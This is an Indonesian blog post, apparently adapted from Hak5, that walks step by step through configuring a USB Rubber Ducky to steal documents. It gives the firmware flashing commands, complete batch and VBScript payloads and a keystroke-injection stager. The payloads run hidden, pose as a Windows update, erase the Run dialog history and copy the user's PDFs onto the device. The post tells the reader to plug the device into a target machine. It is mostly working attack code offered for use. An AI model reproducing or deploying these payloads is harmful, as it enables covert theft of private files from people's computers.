Jika Anda baru mengenal USB Rubber Ducky, itu adalah alat serangan injeksi keystroke asli. Artinya, meskipun terlihat seperti Drive USB, ia berfungsi

Hallo Malam . . .

Kali ini saya akan membagikan post tentang usb ducky. Jika kalian tidak mengerti apa itu Usb Ducky bisa klik Apa itu Usb Rubber Ducky - Seccodeid. Jika kamu sudah mengerti skuy scroll kebawah ya hehe.

Dikutip dari Hak5Blog

Sebagai alat serangan injeksi keystroke yang mampu meniru keyboard USB dan penyimpanan massal, USB Rubber Ducky unggul dalam dokumen yang dapat disaring secara otonom - atau yang biasa kami sebut melakukan pencadangan tidak disengaja. Pada artikel ini saya akan menjelaskan secara singkat langkah-langkah yang diperlukan untuk mengubah USB Rubber Ducky Anda menjadi mesin eksfiltrasi dokumen, seperti yang dijelaskan pada Hak5 episode 2112, 2113 dan 2114.

Rubber Ducky

Jika Anda baru mengenal USB Rubber Ducky, itu adalah alat serangan injeksi keystroke asli. Artinya, meskipun terlihat seperti Drive USB, ia berfungsi seperti keyboard - mengetik lebih dari 1000 kata per menit. Muatan yang dibuat secara khusus seperti ini meniru pengguna tepercaya, memasukkan penekanan tombol ke komputer dengan kecepatan super. Setelah dikembangkan, siapa pun yang memiliki keterampilan rekayasa sosial atau akses fisik dapat menerapkan muatan ini dengan mudah. Karena komputer mempercayai manusia, dan secara inheren keyboard, komputer mempercayai USB Rubber Ducky.

Hal yang anda perlu

- USB Rubber Ducky
- OS Linux (misalnya Kali)
- c_duck_v2.1.hex
- dfu-programmer
- The duck slurp files
- The USB Exfiltration payload
- A Duck Encoder

Flash USB Rubber Ducky Anda ke firmware “Twin Duck”

Baik menggunakan perintah dfu-programmer dan c_duck_v2.1.hex secara manual, atau alat ducky-flasher, flash USB Rubber Ducky dengan firmware “Twin Duck” dari Midnightsnake untuk mengaktifkan Keyboard HID USB dan Penyimpanan Massal USB. Mulailah dengan menekan kuat tombol tekan mikro pada USB Rubber Ducky saat mencolokkannya ke komputer Linux Anda dan tetap menahannya selama sekitar 5 detik setelah koneksi. Kemudian jalankan alat ducky-flasher dan ikuti wizard, atau gunakan dfu-programmer untuk secara manual menghapus, mem-flash, dan mengatur ulang perangkat.

Code 1

sudo dfu-programmer at32uc3b1256 erase

sudo dfu-programmer at32uc3b1256 flash --suppress-bootloader-mem c_duck_v2.1.hex

sudo dfu-programmer at32uc3b1256 reset

Ubah nama label volume kartu Micro SD menjadi “_”

Menggunakan gparted atau Windows explorer, ganti nama label volume kartu Micro SD USB Rubber Ducky menjadi “_” (tanpa tanda kutip). Ini akan menghemat karakter dan dengan demikian membuat muatan stager kita lebih cepat. Cara termudah untuk mengganti nama label volume adalah dari Windows Explorer. Dari "My Computer" pilih drive dan tekan F2. Ketik _ dan tekan enter. Selesai.

Salin muatan bertahap ke root kartu Micro SD yang baru diganti namanya

Anda memerlukan 3 file dan 1 direktori - d.cmd, e.cmd, i.vbs, dan direktori "slurp". Stager kami akan mengeksekusi d.cmd dari root drive dengan nama volume "_". Dalam hal ini d.cmd akan secara tidak terlihat mengeksekusi e.cmd menggunakan i.vbs.

d.cmd

@echo off

start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

cscript %~d0\i.vbs %~d0\e.cmd

@exit

e.cmd

@echo off

@echo Installing Windows Update

REM Delete registry keys storing Run dialog history

REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time

REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%

mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (

REM /C Continues copying even if errors occur.

REM /Q Does not display file names while copying.

REM /G Allows the copying of encrypted files to destination that does not support encryption.

REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.

REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories

xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul

)

REM Blink CAPSLOCK key

@cls

@exit

i.vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Terakhir buat direktori slurp di root kartu Micro SD berlabel "_"

Encode payload stager

Sekarang setelah firmware di-flash dan file bertahap tersedia, kami siap untuk menyiapkan stager. Ini akan menjadi skrip ducky yang menjalankan file dengan sangat cepat yang memanggil file di drive Mass Storage untuk menyalin file dari folder Dokumen pengguna.

REM USB Exfiltration Payload from Hak5 episodes 2112 - 2114

REM Target: Windows XP SP3+ Author: Hak5Darren Props: Diggster, Midnightsnake

DELAY 1000

GUI r

DELAY 100

STRING powershell ".((gwmi win32_volume -f 'label=''_''').Name+'d.cmd')"

ENTER

Simpan ini sebagai file teks ASCII standar yang siap untuk dienkode oleh Ducky Script Encoder, seperti command line Java encoder, GUI Java encoder, command line Python encoder / decoder atau Online Ducky Script Encoder.

Itu dia! Colokkan USB Rubber Ducky yang baru dikonfigurasi dengan muatan Eksfiltrasi ke mesin target dan dalam beberapa detik akan mulai menyalin file tanpa terlihat dari direktori Dokumen pengguna. Tentu saja semua ini dapat dikustomisasi dan dikonfigurasi dengan mengubah file cmd di root kartu Micro SD. Secara default file PDF akan disalin ke direktori slurp di direktori baru yang diberi nama setelah nama host dan cap tanggal dan waktu AS. Selamat menikmati !

Source : HAK5 Stealing Data With Rubber Ducky

Mencuri File dengan USB Rubber Ducky - Penjelasan Eksfiltrasi USB

Komentar